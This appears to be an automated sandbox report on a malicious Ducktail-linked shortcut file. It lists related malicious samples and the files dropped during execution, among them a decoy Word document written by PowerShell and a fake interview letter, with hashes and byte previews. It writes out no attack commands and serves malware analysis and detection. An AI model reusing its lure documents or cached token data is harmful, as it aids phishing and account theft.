                                                                  cOOhDuNWt7.lnkGet hashmaliciousDucktailBrowse
                                                                    O5PR3i6ILA.lnkGet hashmaliciousDucktailBrowse
                                                                      SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET lnk.lnkGet hashmaliciousDucktailBrowse
                                                                        aQuwmiym51.lnkGet hashmaliciousDucktailBrowse
                                                                          gW6FHWNFzR.lnkGet hashmaliciousDucktailBrowse
                                                                            U82W1yZAYQ.lnkGet hashmaliciousDucktailBrowse
                                                                              ZGMW2wgPzY.lnkGet hashmaliciousDucktailBrowse
                                                                                z0gG2GA9vG.lnkGet hashmaliciousDucktailBrowse
                                                                                  About-Us.docx lnk.lnkGet hashmaliciousDucktailBrowse

                                                                                    Created / dropped Files

                                                                                    C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                                                                                    Download File
                                                                                    Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):118
                                                                                    Entropy (8bit):3.5700810731231707
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                    MD5:573220372DA4ED487441611079B623CD
                                                                                    SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                    SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                    SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                    Malicious:false
                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                                                                                    C:\ProgramData\Microsoft\Office\Licenses\5\Perpetual\21661362613116367064193984360 (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):19716
                                                                                    Entropy (8bit):3.8822186064387743
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:8yD8GqcNTBitsd+NdsnFaFDUZYG+w1m3EGQpPcMautt4P/GIF+H1Z:8yD8GhBitTnbpel+Fn2Pcu4PXF+VZ
                                                                                    MD5:C6235259193A8F99ADC987410240695D
                                                                                    SHA1:3EBD81DE1DB7DCF770DA0EC40231902DA5428AA3
                                                                                    SHA-256:F9D29FC800CD1079A09785CCB83092CD702DA87EB0AD6C40EA0A2934B5E3AC52
                                                                                    SHA-512:1CC712CF1E72D53B6F39998A41D2D0B5B516846785AAB59CC2DA9C415909BC27D3A819986C1FE0A2631626A9261E9A3557F301FAB92CC7C3B1C21F0AA9D77204
                                                                                    Malicious:false
                                                                                    Preview:{.".L.i.c.e.n.s.e.".:.".e.y.J.V.c.2.V.y.U.H.J.v.Z.m.l.s.Z.U.l.k.I.j.p.u.d.W.x.s.L.C.J.N.Y.X.h.E.Z.X.Z.p.Y.2.V.z.Q.W.x.s.b.3.d.l.Z.C.I.6.M.S.w.i.Q.W.N.0.a.X.Z.h.d.G.l.v.b.k.R.h.d.G.U.i.O.i.I.y.M.D.I.z.L.T.A.4.L.T.E.3.V.D.E.y.O.j.I.1.O.j.U.4.L.j.Y.w.M.T.E.x.N.T.d.a.I.i.w.i.R.X.J.y.b.3.J.G.Y.W.x.s.Y.m.F.j.a.0.N.h.d.G.V.n.b.3.J.5.I.j.p.u.d.W.x.s.L.C.J.S.Z.W.5.l.d.2.F.s.V.G.9.r.Z.W.4.i.O.i.J.l.e.U.p.K.W.k.d.W.d.W.R.H.b.D.B.l.U.0.k.2.S.W.x.0.V.m.M.y.V.n.l.T.V.1.E.5.V.j.B.4.S.l.J.D.M.H.d.N.R.E.F.6.T.k.R.B.d.0.1.U.R.T.J.O.e.m.R.G.U.k.R.j.M.0.8.w.T.n.B.a.R.D.A.0.T.m.p.J.N.F.p.H.T.T.F.O.R.F.p.r.W.X.p.r.N.U.5.E.W.T.V.P.M.D.V.o.Y.l.d.V.O.U.1.E.Q.X.d.N.e.l.F.3.T.U.R.F.e.E.5.q.Y.z.N.S.V.V.E.z.T.j.E.w.a.U.x.D.S.k.l.Z.W.E.p.r.Z.D.J.G.e.V.p.V.b.G.t.J.a.m.9.p.U.U.R.F.M.0.5.6.T.T.J.N.a.k.U.x.T.W.p.N.e.k.5.E.V.X.l.N.R.E.k.x.T.m.p.F.d.0.1.E.R.T.R.O.a.k.V.6.T.X.p.j.e.U.9.U.Y.3.p.O.e.l.F.3.T.W.p.V.d.0.1.U.a.3.d.N.V.F.k.1.T.0.R.J.N.U.1.6.Y.z.V.O.R.G.c.w.T.k.R.n.d.0.5.U.T.T.N.O.a.k.U.y.T.X.p.N.N.E.9.U.V.X.d.P.

                                                                                    C:\Users\user\AppData\LocalLow\Intel\ShaderCache\55358e20b61aed6fcad5b2283103fb1fe9f3dd3668577b575161f953d12f5a3f

                                                                                    Download File
                                                                                    Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):97665
                                                                                    Entropy (8bit):7.947225234875305
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:uqc7pHXAsaUM1YiadRi0tj3hj3ZbMbyAeM21n6mPPTP0QojNhEV5AjT/vUoep:Zc76saUM6iadjJx3ZbUyg2tP70QS2EUl
                                                                                    MD5:81B08A4867F3B797D6E1DCDEDB79E15B
                                                                                    SHA1:A43025E0156BA0466D6A6830B1128A0F5E603E75
                                                                                    SHA-256:FBB4F75C44A1C3A3AED2EBEB90EDE8116C0A733B93EB6516E631A2D055BA4B82
                                                                                    SHA-512:6858CFBEA0F3E4E5DCFDAC68888921333C493B272D4DD54F01433986F6DD9C23903A8A8B473491BFF227A071CA17AF763AD7093C9C5341541B1EDCF8B273C537
                                                                                    Malicious:false
                                                                                    Preview:INSC.>.....Mar222021151921.38._......?Y... j.1/....s.h...fE............................0..bx.c`@.....^2200..A.....,.X)..(]..n(@.......Kc03.....}.......OB...d.?P... q.f.I..@j.........x.A#. ......Q@..C.#..!.`.U.....G..}..3....q.3B..*.4...=... .o... .....bJ.......c.~.`..pE0z"....xcu@.....P...7..;...#C...;.e.y@?.......P>(...v..(L@..P{.|nF..jf.0]...kY!t....Y......('.....e`>.7.f..b0fH`..`d.........O`...a..v...D.....v.....|B3...P...x.cD.@v.h....[j..."._.=.).HZ....t..................A...Xjx..Io.@..=vl.R.hX.NYR@.f......."T.-.LY...C..zB..7....8...*.M%..H.....Q.*.HL4....e.q..G...K....Z..\...'PXa.|.V2.....>.|q>;9o...o.,|n.!..J.......I..P.P....7..l.?.)m...._,....M...=..c.....w.....Y.~.o...."../....V)N...Q.^!.D...M.w.iLd.+4\"...n..T.w.F%..u./..2.|.v.`h..FEj~..}.5j~.D.j._.5_(..(-Do.Fu.2......E.S. :.Qt.&..E.m.......J..GD."o.yO.k.:....D.S..@.3.s.u..%......7P.&..B..s.....!...6.........9.>...g...R...._f..0.1...s<..4.....}./P..:.~\..c....1h.}\.....=..ub

                                                                                    C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

                                                                                    Download File
                                                                                    Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):2278
                                                                                    Entropy (8bit):3.8373654449886656
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:uiTrlKxsxxwxl9Il8uChtlfCNzVZDAXbCku6aAXd1rc:v8YEtlfCNzVZEXlu6aAg
                                                                                    MD5:9364089F9076B7DBAA70B6344A2E05B0
                                                                                    SHA1:66D0CB58B077C8066D1E5A2606DFF275B2B7289D
                                                                                    SHA-256:65D59B57DB79F883289679F516FE3DFA9F2826DF7EA7070970E13687AEC5E380
                                                                                    SHA-512:44E958F2F6F638F71ED6D608247FC39706CFEF234B723CCFD7039A2BBCC4841699811020836DB8849CBA77587DA0D5A234865CB4FBCF2E076C06153B0434F425
                                                                                    Malicious:false
                                                                                    Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.J.1.m.u.g.S.o.z.s.S.9.x.S.Z./.Q.v.O.c.+.E.J.4.u.2.c.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.N.c.D.g.d.E.x.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.8.d./.D.2.y.

                                                                                    C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres

                                                                                    Download File
                                                                                    Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):4542
                                                                                    Entropy (8bit):3.9950601021308043
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:vYvlo24esUa3iZQ35hgoEoYqKQZgREnpTwKzA8p:vGj4evZK5hDQ6TNAQ
                                                                                    MD5:A50C723124ABA38033DAA2A2AD5ACC03
                                                                                    SHA1:F70EF7A23C51C4309454F7C8AAD40DC6775BB03F
                                                                                    SHA-256:562AE335AF4F9A26874F872E15A3CF8BF9C9D51C71A97134008B3F1B478CBAF2
                                                                                    SHA-512:7356050E0CECB282AED13F37603543E9621BC2C1FB23488D87846C696A9CB9E256C09EDE87D731DD5ACE2A0042A051E996373084A661DCC475D0828D324E48C5
                                                                                    Malicious:false
                                                                                    Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.q.Y.a.6.3.X.Y.9.b.4.Y.b.C.Z.g.f.0.u.y.E.6.v.n.x.e.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".X.C.Q.Y.Z.8.k.x.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.8.d./.D.2.y.

                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{314375AB-F3C1-4554-AFF7-9583BC57AF49}.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):3040
                                                                                    Entropy (8bit):3.5377940184093926
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:cfNhiRuLndkS+wub4jN7tNXOkzCeBRN1Hiw0c2ey/q/aZ1yYs5qjhVLxCcyDRsn2:cfNhzLdkS+R5LS21qCZ1yJ5qjPAtRsn2
                                                                                    MD5:103A36557D0CD39754531EEE87F0D523
                                                                                    SHA1:F045CA1D92A03F1A534352761059068D86FC7E2B
                                                                                    SHA-256:EC576282A853E2475039263EB5880B5CBDEA8AA8F602AC6B75F8E69F84EB8A4F
                                                                                    SHA-512:20C333712F83E9E91C69BA707BBA8932F337D2EEF893E4210839CF1D0D1187D64059D28F97DC0A08531A796F276F061801E3FF3934F1B5BADB6D0507C599E94D
                                                                                    Malicious:false
                                                                                    Preview:..M.e.e.t.i.n.g. .R.e.g.i.s.t.i.o.n...R.e.c.i.p.i.e.n.t.'.s. .A.d.d.r.e.s.s.:...H.a.v.a.s. .G.l.o.b.a.l. .(.D.i.g.i.t.a.l. .N.a.t.i.v.e.)...7.8.9. .O.a.k. .D.r.i.v.e...C.i.t.y.v.i.l.l.e.,. .U.S.A. .6.7.8.9.0.....D.e.a.r.,.....I. .a.m. .w.r.i.t.i.n.g. .t.h.i.s. .l.e.t.t.e.r. .t.o. .c.o.n.f.i.r.m. .o.u.r. .i.n.t.e.r.v.i.e.w. .s.c.h.e.d.u.l.e.d. .o.n. .1.1./.2.5./.2.0.2.4. .a.t. .6. .p...m... .I. .a.m. .e.x.c.i.t.e.d. .t.o. .m.e.e.t. .y.o.u. .a.n.d. .d.i.s.c.u.s.s. .t.h.e. .d.e.t.a.i.l.s. .o.f. .o.u.r. ...............&...................$...&...D...F...............................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):20010
                                                                                    Entropy (8bit):5.02483968322263
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:Prib43WKmVoGIpN6KQkj2Fkjh4iUxDhQIeFzUpX+OdBNNXp5yvOjJlYoaYpib47:PRWKmV3IpNBQkj2Uh4iUxDhiFzUpX+Oh
                                                                                    MD5:435D032DDB5301D507119F054ABE9587
                                                                                    SHA1:E5D4154F38575B85F59ECEBAED506F2C8EBB9F73
                                                                                    SHA-256:A0309E124EAB5BCDEA5BF518D641576499DE7FEAA5662CC95F6ABD5EAF5853E9
                                                                                    SHA-512:23B177CC2418E2A5677DE81CBE648CA651C7DA91E06D7847C02015FA89D2A3B321800DC5E9C6E6B028436ED54A56A36785058F73C12836DC774C24BDA3E182C1
                                                                                    Malicious:false
                                                                                    Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1760
                                                                                    Entropy (8bit):5.686340900352076
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:PSp4iiqbymxx4RIoUP7g9qr9tK8N0+5nOA+y0DlINqzKjlzy:ayYvnIfL9qr2Kr5nOA5WlIpZG
                                                                                    MD5:6B1056695204D1A334836C052F761653
                                                                                    SHA1:1385BFE7289F896FB9EB0C2C661EDB1302F3F688
                                                                                    SHA-256:D116E60B444F2FC55B70E7B9C9835BD64CDE4EBC646FD86D41BF19E250A569CF
                                                                                    SHA-512:C4B243D89F15DF6A1CF338B229BFE79E9E2BEC8290594564EC6A4C9270CF605249FB8E086F11E41F59356A248E64F08AEB279AC0D6F964AC87CC5B7AABE7E5CA
                                                                                    Malicious:false
                                                                                    Preview:@...e...........R.....................^..............@..........@................P....bG....zI..........System.Web.Extensions...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0..................)W_tD...B..T.........System..4...............-..Q...H..g............System.Core.D................g$H..K..I.............System.Management.Automation<.................YS.eE..9.G...........System.Management...@...............8Ak....G.......j........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4................x..:.9@.N4Jgf..........System.Data.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

                                                                                    C:\Users\user\AppData\Local\Temp\3A12183B.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):19716
                                                                                    Entropy (8bit):3.8822186064387743
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:8yD8GqcNTBitsd+NdsnFaFDUZYG+w1m3EGQpPcMautt4P/GIF+H1Z:8yD8GhBitTnbpel+Fn2Pcu4PXF+VZ
                                                                                    MD5:C6235259193A8F99ADC987410240695D
                                                                                    SHA1:3EBD81DE1DB7DCF770DA0EC40231902DA5428AA3
                                                                                    SHA-256:F9D29FC800CD1079A09785CCB83092CD702DA87EB0AD6C40EA0A2934B5E3AC52
                                                                                    SHA-512:1CC712CF1E72D53B6F39998A41D2D0B5B516846785AAB59CC2DA9C415909BC27D3A819986C1FE0A2631626A9261E9A3557F301FAB92CC7C3B1C21F0AA9D77204
                                                                                    Malicious:false
                                                                                    Preview:{.".L.i.c.e.n.s.e.".:.".e.y.J.V.c.2.V.y.U.H.J.v.Z.m.l.s.Z.U.l.k.I.j.p.u.d.W.x.s.L.C.J.N.Y.X.h.E.Z.X.Z.p.Y.2.V.z.Q.W.x.s.b.3.d.l.Z.C.I.6.M.S.w.i.Q.W.N.0.a.X.Z.h.d.G.l.v.b.k.R.h.d.G.U.i.O.i.I.y.M.D.I.z.L.T.A.4.L.T.E.3.V.D.E.y.O.j.I.1.O.j.U.4.L.j.Y.w.M.T.E.x.N.T.d.a.I.i.w.i.R.X.J.y.b.3.J.G.Y.W.x.s.Y.m.F.j.a.0.N.h.d.G.V.n.b.3.J.5.I.j.p.u.d.W.x.s.L.C.J.S.Z.W.5.l.d.2.F.s.V.G.9.r.Z.W.4.i.O.i.J.l.e.U.p.K.W.k.d.W.d.W.R.H.b.D.B.l.U.0.k.2.S.W.x.0.V.m.M.y.V.n.l.T.V.1.E.5.V.j.B.4.S.l.J.D.M.H.d.N.R.E.F.6.T.k.R.B.d.0.1.U.R.T.J.O.e.m.R.G.U.k.R.j.M.0.8.w.T.n.B.a.R.D.A.0.T.m.p.J.N.F.p.H.T.T.F.O.R.F.p.r.W.X.p.r.N.U.5.E.W.T.V.P.M.D.V.o.Y.l.d.V.O.U.1.E.Q.X.d.N.e.l.F.3.T.U.R.F.e.E.5.q.Y.z.N.S.V.V.E.z.T.j.E.w.a.U.x.D.S.k.l.Z.W.E.p.r.Z.D.J.G.e.V.p.V.b.G.t.J.a.m.9.p.U.U.R.F.M.0.5.6.T.T.J.N.a.k.U.x.T.W.p.N.e.k.5.E.V.X.l.N.R.E.k.x.T.m.p.F.d.0.1.E.R.T.R.O.a.k.V.6.T.X.p.j.e.U.9.U.Y.3.p.O.e.l.F.3.T.W.p.V.d.0.1.U.a.3.d.N.V.F.k.1.T.0.R.J.N.U.1.6.Y.z.V.O.R.G.c.w.T.k.R.n.d.0.5.U.T.T.N.O.a.k.U.y.T.X.p.N.N.E.9.U.V.X.d.P.

                                                                                    C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App_1731061780708939500_BCD44289-A099-46BC-87FE-502EB63FA009.log

                                                                                    Download File
                                                                                    Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:ASCII text, with very long lines (14360), with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):16777216
                                                                                    Entropy (8bit):0.02769999193038955
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:acjOwzufT5r+E+6AKhmEHPzqgUTf/mnjGVgpBG:w1biTf
                                                                                    MD5:5CD7AB20AC27FBBB206DD4075991EB4E
                                                                                    SHA1:24923FB33F17269E8D511BF1FDE3C709022031BB
                                                                                    SHA-256:F565BAF94BB99134DB2E0366F2B1067CDBA08D1FCD52C5299097901C993ED0FC
                                                                                    SHA-512:50F494376E9EE10E2516DB49066F32C1BFBB4BD3C11EAF91A252118CC2F99EAB94BE2308320C8C4E9C3012CB417513EDB855E46CE1C8BDF39D81AB9F21A06BA9
                                                                                    Malicious:false
                                                                                    Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..11/08/2024 10:29:41.360.WINWORD (0x42C).0x8D8.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Word.FileOpen.UserInitiatedOpen","Flags":2814775553802753,"InternalSequenceNumber":60,"Time":"2024-11-08T10:29:41.360Z","Contract":"Office.System.Activity","Activity.CV":"iULUvJmgvEaH/lAutj+gCQ.1.18","Activity.Duration":283780,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Activity.Result.Code":0,"Activity.Result.Tag":37262085,"Data.OpenInitiateKind":3,"Data.fOpenFromBoot":true,"Data.fZrtOpenRequested":true,"Data.zrtRequestedReason":4,"Data.ScanRequiredResult":0,"Data.fFileAlreadyOpen":0,"Data.FileIOClpState":0,"Data.MainPdod":2493469380128,"Data.Measurements":"cZ28ib7ii16iG3iK2iL13iU4iY22ja1jc1jd3jg1jh10ji1jj8jk41jl4jm2jn3jo9jr6js4jx23jN2kn1ks11kx2lf2a35ymo0b278","Data.TrackbackTag":37262080,"Data.IntermediateResultsTotalCount":1,"Data.IntermediateResults":"[{\"Code\":0,\"Tag\":

                                                                                    C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App_1731061780710943400_BCD44289-A099-46BC-87FE-502EB63FA009.log

                                                                                    Download File
                                                                                    Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):16777216
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3::
                                                                                    MD5:2C7AB85A893283E98C931E9511ADD182
                                                                                    SHA1:3B4417FC421CEE30A9AD0FD9319220A8DAE32DA2
                                                                                    SHA-256:080ACF35A507AC9849CFCBA47DC2AD83E01B75663A516279C8B9D243B719643E
                                                                                    SHA-512:7E208B53E5C541B23906EF8ED8F5E12E4F1B470FBD0D3E907B1FC0C0B8D78EB1BBFB5A77DCFD9535ACF6FA47F4AB956D188B770352C13B0AB7E0160690BAE896
                                                                                    Malicious:false
                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\Meeting-Registration.pdf.docx

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:Microsoft Word 2007+
                                                                                    Category:dropped
                                                                                    Size (bytes):13576
                                                                                    Entropy (8bit):7.267947119520991
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:CtgStst3yJCCNxtpgoZ22NNBL8U/PSsJ80GnVDLeBUvP43JKto:agSmmdNxt/ZtNNZT/qsPGn5LeqHgJKto
                                                                                    MD5:9B7F51774E87639BA4ABF7CAE65B776A
                                                                                    SHA1:ED10388E01605623883D123A0D8C8F19EE659B3F
                                                                                    SHA-256:9536EBC1FB5DBE6C14BB2D73C66A4863266DA4785ED516C1C8F10182B51F79B3
                                                                                    SHA-512:29A548A876BB0F45D14B0961B7BEBF5BADCD4A4067A733452E164A65A5EC090D43D32A1834541ABB813EA2965649392F3CE15513A91273E000067A8E671B966B
                                                                                    Malicious:false
                                                                                    Preview:PK..........!...lZ... .......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................n.0.E......Ub.*..>.-R...{.V.......QU...l"%3..3V...l...w%..=...^i7+...-.d.&.0.A.6.l4...L6.0#...S.O.....X...*..V$z.3....3.......%p)O....^......5}nH".d.s.Xg.L.`....|...|.P.r.s.....?.PW...t.t4Q+..".wa...|T\y...,N....U.%...-D/......X...(.....<E....)....;.N..L?.F.........<Fk...h..y........q..i..?..l..i..1...].H.g...m.@.....m........PK..........!.........N......._rels/.rels ...(.......................................

                                                                                    C:\Users\user\AppData\Local\Temp\RES3C76.tmp

                                                                                    Download File
                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Fri Nov 8 10:29:28 2024, 1st section name ".debug$S"
                                                                                    Category:dropped
                                                                                    Size (bytes):1336
                                                                                    Entropy (8bit):3.9953480622793256
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:H3zgm9hblaosHhAwKGmNII+ycuZhNtcakSsxPNnqSSd:X3blaospKGmu1ulKa3eqSC
                                                                                    MD5:49758D9BE37F297D6A0AA56A98BF3170
                                                                                    SHA1:5848AA78A66E22895FE80F83A3D5F6DFDA708691
                                                                                    SHA-256:2A787ECABB0719932F0E90C5E1FA1E8F545AFB4C122407868331784E943ADA09
                                                                                    SHA-512:19447249DB2164C409A389F572AA38F9EC66CCDBF6FA8F58A4D1B43720CA8BE8EF675F108D43A22DE023C20664F2F8896FBBB96979489ED5FEEC02139DA022C1
                                                                                    Malicious:false
                                                                                    Preview:L.....-g.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\t1fagedb\CSC5EF4F498469D4A7EB6829710C89A123D.TMP..................qI..[.g.p.................5.......C:\Users\user\AppData\Local\Temp\RES3C76.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.1.f.a.g.e.d.b...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_10c3kpbl.yjh.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
